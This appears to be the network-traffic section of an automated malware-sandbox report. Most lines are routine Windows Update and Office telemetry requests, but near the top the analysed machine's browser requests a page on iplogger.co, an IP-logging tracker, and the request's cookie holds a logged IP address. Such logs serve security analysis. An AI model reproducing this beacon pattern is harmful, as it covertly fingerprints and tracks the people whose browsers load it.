                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                Source: global trafficHTTP traffic detected: GET /1tJFB4 HTTP/1.1Host: iplogger.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iplogger.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iplogger.co/1tJFB4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 56396975137264100=3; clhf03028ja=8.46.123.228
                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iplogger.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 56396975137264100=3; clhf03028ja=8.46.123.228
                Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=stBxbGhrHxDYMZ9&MD=gESBNraw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=stBxbGhrHxDYMZ9&MD=gESBNraw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
